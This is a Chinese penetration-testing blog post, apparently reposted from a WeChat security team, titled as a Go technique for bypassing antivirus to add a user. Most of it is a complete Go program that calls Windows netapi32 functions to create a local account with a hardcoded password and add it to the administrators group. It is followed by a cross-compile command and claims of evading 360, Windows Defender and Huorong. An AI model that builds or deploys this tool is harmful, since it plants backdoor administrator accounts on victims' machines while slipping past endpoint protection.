Go实现bypass 杀软添加用户

渗透技巧 1年前 (2022) admin

397 0 0

效果如下：

bypass 360、Windows Denfender、火绒

Go实现bypass 杀软添加用户

代码：

package main
import (  "fmt"  "syscall"  "unsafe")
// 定义Windows API函数的参数类型和返回值类型// 下面是NetLocalGroupAddMembers函数的定义：// NET_API_STATUS NetLocalGroupAddMembers(//     LPCWSTR servername,//     LPCWSTR groupname,//     DWORD   level,//     LPBYTE  buf,//     DWORD   totalentries// );var (    mod         = syscall.NewLazyDLL("netapi32.dll")    proc        = mod.NewProc("NetLocalGroupAddMembers")    group       = syscall.StringToUTF16Ptr("administrators") // 组名    server      = syscall.StringToUTF16Ptr("")               // 服务器名，为空表示本地计算机    level       = uint32(3)                                  // 参数level的值    totalEntries = uint32(1)                                  // 参数totalentries的值)
// 定义LOCALGROUP_MEMBERS_INFO_3type localGroupMembersInfo3 struct {    Lgrmi3_domainandname *uint16 // 用户名}
var (  modNetapi32 = syscall.NewLazyDLL("netapi32.dll")  procNetUserAdd = modNetapi32.NewProc("NetUserAdd")  procNetLocalGroupAddMembers = modNetapi32.NewProc("NetLocalGroupAddMembers"))
// USER_INFO_1 contains information about a user account.type USER_INFO_1 struct {  Name            *uint16  Password        *uint16  PasswordAge     uint32  Priv            uint32  HomeDir         *uint16  Comment         *uint16  Flags           uint32  ScriptPath      *uint16}
func main() {  // Set up the USER_INFO_1 struct with the user's information.  user := USER_INFO_1{    Name: syscall.StringToUTF16Ptr("newuser"),    Password: syscall.StringToUTF16Ptr("password"),    PasswordAge: 0,    Priv: 1,    HomeDir: nil,    Comment: nil,    Flags: 0x0001,    ScriptPath: syscall.StringToUTF16Ptr("C:\Users\newuser\profile.cmd"),  }
  // Call the NetUserAdd function to add the user to the system.  var parmErr uint32  var err error  r1, _, err := procNetUserAdd.Call(    0,    1,    uintptr(unsafe.Pointer(&user)),    uintptr(unsafe.Pointer(&parmErr)),  )  if r1 != 0 {    // An error occurred.    fmt.Println("Error adding user:", err)  } else {    fmt.Println("Successfully added user.")
    // 将newuser添加到管理员组    username := syscall.StringToUTF16Ptr("newuser") // 用户名    buf := localGroupMembersInfo3{Lgrmi3_domainandname: username}    r1, _, err := proc.Call(        uintptr(unsafe.Pointer(server)),        uintptr(unsafe.Pointer(group)),        uintptr(level),        uintptr(unsafe.Pointer(&buf)),        uintptr(totalEntries),    )    if r1 != 0 {        fmt.Println("Error:", err)    } else {        fmt.Println("Successfully added administrators group.")    }  }}

编译方法：

CGO_ENABLED=0 GOOS=windows GOARCH=amd64 go build go_adduer.go

原文始发于微信公众号（川云安全团队）：Go实现bypass 杀软添加用户

版权声明：admin 发表于 2022年12月7日下午6:31。
转载请注明：Go实现bypass 杀软添加用户 | CTF导航

每日安全动态推送(4-10)

admin

392

AnyDesk和TeamViewer在渗透测试中的应用

admin

935

Bug Bounty Tip | SRC漏洞挖掘案例学习

admin

862

浙江大学 | AttacKG：从网络威胁情报报告构建技术知识图谱

admin

324

开源WAF规则运营入门

admin

129

Apache ActiveMQ < 5.18.3 远程代码执行漏洞分析

admin

239

暂无评论

您必须登录才能参与评论！

立即登录

暂无评论...

Go实现bypass 杀软添加用户

Bug Writeup: RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass

Cobaltstrike二开系列（四）

相关文章

暂无评论

相关文章

Go实现bypass 杀软添加用户

Bug Writeup: RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass

Cobaltstrike二开系列（四）

相关文章

暂无评论

广告位

相关文章